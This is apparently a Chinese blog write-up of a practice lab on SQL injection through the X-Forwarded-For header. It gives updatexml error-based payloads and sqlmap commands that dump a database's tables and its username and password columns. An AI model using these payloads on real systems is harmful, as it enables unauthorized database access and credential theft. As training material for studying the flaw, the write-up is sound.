X-Forwarded-For注入

释放双眼,带上耳机,听听看~!

靶机为墨者学院的:https://www.mozhe.cn/bug/detail/QWxmdFFhVURDay90L0wxdmJXSkl5Zz09bW96aGUmozhe

0x01:什么是X-Forwarded-For(XFF)

X-Forwarded-For(XFF)是用来识别通过HTTP代理负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。(简单说就是为了获取你的ip地址)

0x02:X-Forwarded-For(XFF)格式详解

client是我们客户端的ip地址,要经过代理服务器proxy1,proxy2连接到web服务器。

  X-Forwarded-For:client,proxy1,proxy2

连接过程:client连接proxy1,proxy1记录client的ip地址,然后proxy1带上请求头转发请求给proxy2。

proxy1的请求头:

X-Forwarded-For:client

转发给proxy2,proxy2记录proxy1的ip地址,然后添加到XFF头里面,之后带着请求头转发给真实的web服务器。

proxy2的请求头:

  X-Forwarded-For:client,proxy1

最后一步,web服务器获取proxy2的ip地址,添加到XFF头里面

web服务器获取的头信息:

 X-Forwarded-For:client,proxy1,proxy2

了解了基本知识之后我们来看这道题

0x03:尝试手工注入

开启burpsuite,随便输入先抓一个包,将XFF写入到请求头中。

发送过去

报错了说明存在注入点,将请求包发送到burpsuite的repeater模块中,接下来我们先尝试手工注入(报错注入updatexml)

updatexml是一个更新xml文档的函数

UPDATEXML (XML_document, XPath_string, new_value);

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc

第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。

第三个参数:new_value,String格式,替换查找到的符合条件的数据

爆出数据库:payload(X-Forwarded-For:1’and updatexml(1,concat(0x7e,database(),0x7e),1) or ‘1’=’1)

因为concat这个函数是将参数拼接成字符串,它不符合updatexml的第二个参数的xpath_string格式。

数据库爆出来了,接下来爆表

爆出表:payload(X-Forwarded-For:1’and updatexml(1,concat(0x7e,(select  group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) or ‘1’=’1)

爆出列

payload(X-Forwarded-For:1’and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=’user’),0x7e),1) or ‘1’=’1)

读取列(username,password)

payload(X-Forwarded-For:1’and updatexml(1,concat(0x7e,(select group_concat(username,’—‘,password)  from user),0x7e),1) or ‘1’=’1)

登录成功拿到flag。

0x04:尝试sqlmap自动注入

将请求包保存为txt类型,放到sqlmap中

payload(sqlmap -r xff.txt –dbs)

接下来爆表

payload(sqlmap -r xff.txt –tablses -D webcalendar)

爆user表的列

payload(sqlmap -r xff.txt –columns -D webcalendar -T user)

爆出username和password字段的数据

payload(sqlmap -r xff.txt  -D webcalendar -T user -C username,password)

输入用户名密码拿到flag。

安全独秀圈漏洞

内网安全:04.netsh获取本机曾经连接过的wifi密码

2020-4-23 9:42:07

WEB安全安全独秀圈漏洞

web安全 的 dvwa 文件上传漏洞

2020-4-23 18:07:22

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
有新私信 私信列表
搜索